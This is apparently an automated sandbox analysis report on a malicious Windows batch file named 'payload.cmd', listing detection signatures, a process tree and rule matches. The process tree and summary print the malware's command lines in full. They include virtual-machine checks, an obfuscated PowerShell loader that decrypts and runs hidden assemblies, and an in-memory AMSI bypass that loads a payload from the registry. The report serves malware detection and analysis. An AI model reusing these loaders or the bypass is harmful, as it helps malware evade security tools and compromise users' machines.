Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
payload.cmd

Overview

General Information

Sample name:payload.cmd
Analysis ID:1524983
MD5:19fc666f7494d78a55d6b50a0252c214
SHA1:8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Tags:azure-winsecure-comcmduser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2460 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\payload.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 1264 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 3848 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • WMIC.exe (PID: 6720 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 4100 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 5064 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 2064 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • WerFault.exe (PID: 6048 cmdline: C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 2156 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2176 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 4268 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 6068 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 4736 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 5580 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • WMIC.exe (PID: 4332 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 5688 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • cmd.exe (PID: 5836 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 5760 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
              • WerFault.exe (PID: 6500 cmdline: C:\Windows\system32\WerFault.exe -u -p 5760 -s 2424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 3020 cmdline: C:\Windows\system32\WerFault.exe -u -p 5760 -s 2388 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • schtasks.exe (PID: 1788 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 6324 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 3168 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • powershell.exe (PID: 3380 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+'a'+[Char](116)+''+[Char](105)+'v'+'e'+'Me'+[Char](116)+''+'h'+'o'+'d'+''+[Char](115)+'');$yPaGlLGCRnduqK=$CXUkrbOMeMwqm.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+'o'+'cAd'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+'u'+'bl'+[Char](105)+'c'+','+'S'+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gdhANoUlJqediWutYNx=gUdwtNDYXkts @([String])([IntPtr]);$xftKyomHPDnrGsBVhDhGVA=gUdwtNDYXkts @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aMpaxAlnYCj=$CXUkrbOMeMwqm.GetMethod('Ge'+[Char](116)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+'an'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+'d'+'l'+'l')));$XzRrrWAvhAruOw=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$aMpaxAlnYCj,[Object](''+'L'+'o'+'a'+'d'+[Char](76)+''+'i'+'b'+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$UyziTvRkQswynWCwx=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$aMpaxAlnYCj,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$qNkPxqC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XzRrrWAvhAruOw,$gdhANoUlJqediWutYNx).Invoke('ams'+[Char](105)+'.'+'d'+'l'+[Char](108)+'');$fOLdsZyQIYWPbckDA=$yPaGlLGCRnduqK.Invoke($Null,@([Object]$qNkPxqC,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+'n'+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$MsjEXyeoZQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UyziTvRkQswynWCwx,$xftKyomHPDnrGsBVhDhGVA).Invoke($fOLdsZyQIYWPbckDA,[uint32]8,4,[ref]$MsjEXyeoZQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fOLdsZyQIYWPbckDA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UyziTvRkQswynWCwx,$xftKyomHPDnrGsBVhDhGVA).Invoke($fOLdsZyQIYWPbckDA,[uint32]8,0x20,[ref]$MsjEXyeoZQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+'b'+''+'x'+'-'+[Char](115)+'t'+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 1796 cmdline: C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 356 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 704 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1212 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1388 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1400 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • Conhost.exe (PID: 3944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2064INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x9d693:$b2: ::FromBase64String(
  • 0x9d6f1:$b2: ::FromBase64String(
  • 0x1171c1:$b2: ::FromBase64String(
  • 0x11b69f:$b2: ::FromBase64String(
  • 0x96f8e:$s1: -join
  • 0x1a55fb:$s1: -join
  • 0x1b26d0:$s1: -join
  • 0x1b5aa2:$s1: -join
  • 0x1b6154:$s1: -join
  • 0x1b7c45:$s1: -join
  • 0x1b9e4b:$s1: -join
  • 0x1ba672:$s1: -join
  • 0x1baee2:$s1: -join
  • 0x1bb61d:$s1: -join
  • 0x1bb64f:$s1: -join
  • 0x1bb697:$s1: -join
  • 0x1bb6b6:$s1: -join
  • 0x1bbf06:$s1: -join
  • 0x1bc082:$s1: -join
  • 0x1bc0fa:$s1: -join
  • 0x1bc18d:$s1: -join
Process Memory Space: powershell.exe PID: 5760INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x5a327:$b2: ::FromBase64String(
  • 0x5a385:$b2: ::FromBase64String(
  • 0xd2fac:$b2: ::FromBase64String(
  • 0xdd928:$b2: ::FromBase64String(
  • 0x30afd:$s1: -join
  • 0x313ea:$s1: -join
  • 0x54e23:$s1: -join
  • 0x46aef:$s3: Reverse
  • 0x2ba8b:$s4: +=
  • 0x2baaa:$s4: +=
  • 0x2bae5:$s4: +=
  • 0x2bb02:$s4: +=
  • 0x2bb3d:$s4: +=
  • 0x2bba9:$s4: +=
  • 0x2bc35:$s4: +=
  • 0x2bd43:$s4: +=
  • 0x2da0e:$s4: +=
  • 0x2da31:$s4: +=
  • 0x326b0:$s4: +=
  • 0x34b01:$s4: +=
  • 0x34b80:$s4: +=

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression 